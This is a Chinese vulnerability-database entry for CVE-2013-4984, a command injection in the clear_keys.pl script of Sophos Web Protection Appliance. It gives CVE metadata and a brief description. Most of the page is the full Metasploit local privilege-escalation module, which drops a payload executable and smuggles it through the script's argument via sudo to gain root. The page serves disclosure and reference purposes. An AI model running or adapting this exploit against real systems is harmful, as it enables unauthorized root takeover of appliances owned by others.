Sophos Web Protection Appliance 本地命令注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121868 漏洞类型 权限许可和访问控制
发布时间 2013-09-17 更新时间 2013-09-18
CVE编号 CVE-2013-4984 CNNVD-ID CNNVD-201309-073
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/28332
https://www.securityfocus.com/bid/62265
https://cxsecurity.com/issue/WLB-2013090121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201309-073
|漏洞详情
SophosWebAppliance(SWA)是英国Sophos公司的一套Web安全网关产品。该产品支持实时网络威胁防护、自定义Web过滤和动态控制应用程序等。SophosWebAppliance3.7.9及之前的版本和3.8.1.1之前的3.8版本中的/opt/cma/bin/clear_keys.pl脚本中的‘close_connections’函数中存在命令注入漏洞。本地攻击者可借助‘second’参数中的shell元字符利用该漏洞获得root权限。
|漏洞EXP
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/exe'


class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Common

  def initialize(info={})
    super( update_info( info, {
      'Name'          => 'Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation',
      'Description'   => %q{
        This module abuses a command injection on the clear_keys.pl perl script, installed with the
        Sophos Web Protection Appliance, to escalate privileges from the "spiderman" user to "root".
        This module is useful for post exploitation of vulnerabilities on the Sophos Web Protection
        Appliance web ui, executed by the "spiderman" user. This module has been tested successfully
        on Sophos Virtual Web Appliance 3.7.0.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Francisco Falcon', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'Platform'       => [ 'linux'],
      'Arch'           => [ ARCH_X86 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        =>[[ 'Linux x86', { 'Arch' => ARCH_X86 } ]],
      'References'     =>
        [
          [ 'CVE', '2013-4984' ],
          [ 'OSVDB', '97028' ],
          [ 'BID', '62265' ],
          [ 'URL', 'http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities']
        ],
      'DefaultOptions' =>
        {
          "PrependFork"      => true,
          "PrependSetresuid" => true,
          "PrependSetresgid" => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 06 2013'
      }
    ))

    register_options([
        # These are not OptPath becuase it's a *remote* path
        OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
        OptString.new("clear_keys",  [ true, "Path to the clear_keys.pl vulnerable script", "/opt/cma/bin/clear_keys.pl" ]),
      ], self.class)
  end

  def check
    if file?(datastore["clear_keys"])
      return CheckCode::Detected
    end

    return CheckCode::Unknown
  end

  def exploit
    print_status("Checking actual user...")
    id = cmd_exec("id -un")
    if id != "spiderman"
      fail_with(Failure::NoAccess, "The actual user is \"#{id}\", you must be \"spiderman\" to exploit this")
    end

    print_status("Checking for the vulnerable component...")
    if check != CheckCode::Detected
      fail_with(Failure::NoTarget, "The vulnerable component has not been found")
    end

    print_status("Dropping the payload to #{datastore["WritableDir"]}")
    exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
    write_file(exe_file, generate_payload_exe)

    cmd_exec "chmod +x #{exe_file}"

    print_status("Running...")
    begin
      # rm the file after executing it to avoid getting multiple sessions
      cmd_exec "sudo #{datastore["clear_keys"]} #{rand_text_alpha(4 + rand(4))} \";#{exe_file}; rm -f #{exe_file};\" /#{rand_text_alpha(4 + rand(4))}"
    ensure
      cmd_exec "rm -f #{exe_file}"
    end
  end
end
|参考资料

来源:www.sophos.com
链接:http://www.sophos.com/en-us/support/knowledgebase/119773.aspx
来源:www.coresecurity.com
链接:http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities
来源:BID
名称:62265
链接:http://www.securityfocus.com/bid/62265